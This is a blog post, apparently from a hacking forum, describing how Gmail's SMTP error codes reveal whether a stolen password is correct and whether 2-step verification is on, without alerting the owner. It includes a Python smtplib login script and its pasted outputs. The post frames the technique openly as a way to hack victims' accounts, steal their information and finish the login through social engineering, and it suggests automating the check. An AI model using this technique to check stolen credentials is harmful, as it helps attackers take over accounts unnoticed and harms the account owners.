View RSS Feed

G3n3Rall

Google Bug: Gmail 2-Step Verification Detector

Rating: 4 votes, 3.00 average.
Hello world! [ Including People , Robots, Zombies Dariush & Arash, Alien dudes if they exist, and my friends ], By the way, I decided to write about a Gmail Bug. Itís not a vulnerability of Gmail but itís some kind of bug let us know if we hack a Gmail, we can login it or not without alert the Gmail owner. I talking about 2-Step verification, Imagine to grab a Gmail password and not be sure to login or not , victim might be use Gmail SMS auth service and when you click login, Google send victim a SMS which include a code to continue login. I got some way to test Gmail account before we login and test it if account have notification or not without any alert SMS. Keep reading to know how to do it.


As we know , Google SMTP can be used to login Gmail from anywhere .so we login from there[SMTP] and check what Gmail SMTP return to us. So now I use a python code to login my account that I activated 2-step protection on that and if anyone login, it should send me a SMS.

PHP Code:
#!/usr/bin/python2.7
#https://github.com/Ali-Razmjoo/z3r0d4y/blob/master/gmail.py
import smtplib
user 
'xxx@gmail.com'
passw 'xxx'
smtp_host 'smtp.gmail.com'
smtp_port 587
server 
smtplib.SMTP()
server.connect(smtp_host,smtp_port)
server.ehlo()
server.starttls()
server.login(user,passw
And when run the script my result was:

PHP Code:
Traceback (most recent call last):
  
File "C:\Users\Ali\Desktop\gmail.py"line 22in <module>
    
server.login(user,passw)
  
File "C:\Python27\lib\smtplib.py"line 614in login
    raise SMTPAuthenticationError
(coderesp)
smtplib.SMTPAuthenticationError: (534'5.7.9 Application-specific password requ
ired. Learn more at\n5.7.9 http://support.google.com/accounts/bin/answer.py?answ
er=185833 w3sm2453216wjf.3 - gsmtp'
)
</
module
Ohhh , Greate , because itís just showing me check out app password url and didnít send me any SMS. So it means my password is not wrong ! But to be sure Iím going to test this with wrong password.

PHP Code:
Traceback (most recent call last):
  
File "C:\Users\Ali\Desktop\gmail.py"line 22in <module>
    
server.login(user,passw)
  
File "C:\Python27\lib\smtplib.py"line 614in login
    raise SMTPAuthenticationError
(coderesp)
smtplib.SMTPAuthenticationError: (535'5.7.8 Username and Password not accepted
. Learn more at\n5.7.8 http://support.google.com/mail/bin/answer.py?answer=14257
 bv6sm2577733wjb.30 - gsmtp'
)
</
module
Now you can see different result. And let me test it with another Gmail which for a long time I didnít use.
PHP Code:
Traceback (most recent call last):
  
File "C:\Users\Ali\Desktop\gmail.py"line 22in <module>
    
server.login(user,passw)
  
File "C:\Python27\lib\smtplib.py"line 614in login
    raise SMTPAuthenticationError
(coderesp)
smtplib.SMTPAuthenticationError: (534'5.7.14 <https: -ykrwwgn7pth55a1tqk3e1gfitbhkmghsuw="" 4agnsmz6qasoci8_lqhs6mclnixpgqw_ops="" accounts.google.com="" dlg2yvdj_qzprqrv_i0l82hy22kcvuvdwscq="" enwfs-dk6nrjrf_thrthuzs555kifmnkek="" inuesignin="" n5.7.14="" ont="" pntqhm8pgwhqork6g4jaqbl5rcyk91sfb3="" sarp="1&scc=1&plt=AKgnsbu3u\n5.7.14" szjzlgqcf2y3wxgua9voyex8kmlf-laboneg="" wueyxesepgpc6rgqcwl9pfo4kwtg=""> Please
log in via your web browser and\n5.7.14 then try again.\n5.7.14 Learn more at\n5
.7.14 https://support.google.com/mail/bin/answer.py?answer=78754 bv6sm2501216wjb
.30 - gsmtp'
)
</
https:></module
Now Google tells me use the browser to login. I donít care about error. But thereís a point! What if we use a Gmail account which we didnít ever use on my PC till now. So I will use my friendís Gmail account and watch the result.
PHP Code:
Traceback (most recent call last):
  
File "C:\Users\Ali\Desktop\gmail.py"line 22in <module>
    
server.login(user,passw)
  
File "C:\Python27\lib\smtplib.py"line 614in login
    raise SMTPAuthenticationError
(coderesp)
smtplib.SMTPAuthenticationError: (534'5.7.9 Application-specific password requ
ired. Learn more at\n5.7.9 http://support.google.com/accounts/bin/answer.py?answ
er=185833 bo3sm2561309wjb.44 - gsmtp'
)
</
module
It seems my friendís been given me true password but he activated Gmail SMS auth. So now we can see that Google didnít work hard on this way. When we have true password, we can login and steal information and if victim using Gmail SMS auth, however, we know whatís the true password and only need a little social engineering to login and steal information. All we need now itís a script to make it automatic check the Gmail account to login with this script and read error to see what happen. If you think Iím going to make a automatic script for you, and put code here, I should tell you that, I am NOT.

Reference


ZCR Zeroday Cyber Research

Ali Razmjoo
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: